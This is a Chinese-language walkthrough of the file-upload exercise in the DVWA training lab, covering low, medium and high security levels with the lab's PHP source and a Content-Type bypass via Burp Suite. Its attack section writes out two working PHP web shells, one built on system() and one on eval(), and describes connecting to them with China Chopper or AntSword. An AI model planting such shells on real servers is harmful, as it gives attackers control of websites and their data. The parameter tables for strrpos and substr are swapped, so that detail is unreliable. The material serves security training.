通常web 站点会有用户注册功能,而当用户登入之后大多数情况下都会存在类似头像上传、附件上传一类的功能,这些功能点往往存在上传验证方式不严格的安全缺陷,是在web 渗透中非常关键的突破口,只要经过仔细测试分析来绕过上传验证机制,往往会造成被攻击者直接上传web 后门,进而控制整个web 业务的控制权,复杂一点的情况是结合webserver 的解析漏洞来上传后门获取权限。
我们可以看到这是一个文件上传的页面,提示让我们上传一个图片。
低等级:
这里我们尝试上传一个txt文本,显示上传成功,说明这个页面没有做任何的防御措施,只是实现了文件上传的功能没有任何安全可言。
查看源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
我们可以看到这里只是采用POST的方式,将文件上传到服务器的hackable/uploads/目录下,除此之外,在没有其他操作。如果上传的为恶意木马,就可以连接到服务器后果不堪设想。
中级别:
可以看到,这次txt文件不能上传了,这里提示我们要上传一个JPEG或者PNG的图片。这里限制了上传的文件类型,服务端限制使用MIME类型,我们可以使用burp suite代理进行修改HTTP包中的Content-Type 字段来绕过服务端的检测。
查看源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
通过源码我们可以看到这里指定了上传文件的类型必须为jpeg和png格式。
绕过:
思路:我们使用burp suite进行代理,拦截浏览器发出的HTTP消息,修改Content-Type 字段为服务端要求的类型,然后再发送给服务端,这样就可以绕过服务器检测。
可以看到我们上传的文件为text格式,这里服务端要求的格式为jpeg和png格式,我们修改为image/jpeg;
通过修改Content-Type 字段,够就能绕过服务端的MIME 类型检测,直接上传其他类型的文件,包括木马,危害极大。
高级别:
先来看一下源码,看它做了什么防御;
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
这里我们可以看到关键的几句话:
它的防御手段是将文件的扩展名截取出来,在来对比看是否为服务端规定的几种,如果不是直接过滤掉,这时我们不能通过修改后缀名来进行上传,,因为系统默认不会执行你的图片,而是将它存放在系统服务器上,如果修改后缀名来上传木马,就会导致木马程序执行失败(不能使用)。
函数解释:
strrpos(string,find,start)
参数 | 描述 |
---|---|
string | 必需。规定要返回其中一部分的字符串。 |
start | 必需。规定在字符串的何处开始。 |
length | 可选。规定被返回字符串的长度。默认是直到字符串的结尾。 |
substr(string,start,length)
参数 | 描述 |
string | 必需。规定被搜索的字符串。 |
find | 必需。规定要查找的字符。 |
start | 可选。规定在何处开始搜索。 |
攻击:
ys.php
<?php system($_REQUEST['1']);?> //网页的输入请求格式,单引号中1的相当于可以赋值的变量
我们可以给1赋一个一句话木马,让服务器执行来破坏服务端。这里我们给1赋一个ls /的命令,这就直接可以列出文件。效果如下:
http://192.168.67.134/dvwa/hackable/uploads/ys.php?1=ls /
按照同样的思路,在文件上传时,我们上传一个这样的php文件,在使用中国菜刀或者蚁剑这样的连接工具连接,即可对网站进行爬取。
文件内容为
<?php @eval($_POST['1']);?> //eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。这里加一个@,就是在全局模式下执行。
上传木马后使用中国菜刀连接,密码为单引号中的字符串,这里也就是1,通过执行PHP文件就可以看到服务端的数据。